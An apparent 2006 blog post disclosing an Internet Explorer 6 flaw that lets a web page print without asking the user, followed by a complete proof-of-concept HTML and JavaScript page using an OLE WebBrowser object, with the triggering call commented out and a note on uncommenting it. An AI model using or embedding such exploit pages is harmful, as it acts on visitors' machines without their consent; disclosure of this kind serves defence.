Home
LoginInternet Explorer Print without Prompting
Июнь 13th, 2006
Vulnerable Systems:
* Internet Explorer version 6
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious document to send pages to the printer without prompting the user. An example page that exploits the vulnerability is given below. The offending line must be commented out in order for the page to work, so are any linebreaks that break the JavaScript code.
<html>
<head>
<script language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{
// Create OLE Object
var WebBrowser = '<object ID="WebBrowser1" WIDTH=0 HEIGHT=0
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></object>';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || ( intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
}
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
}
</script>
</head>
<body onload="printAll()">
<h3>I like your PRINTER</h3>
</body>
</html>
Entry Filed under: JavaScript
Leave a Comment
You must be logged in to post a comment.
Trackback this post | Subscribe to the comments via RSS Feed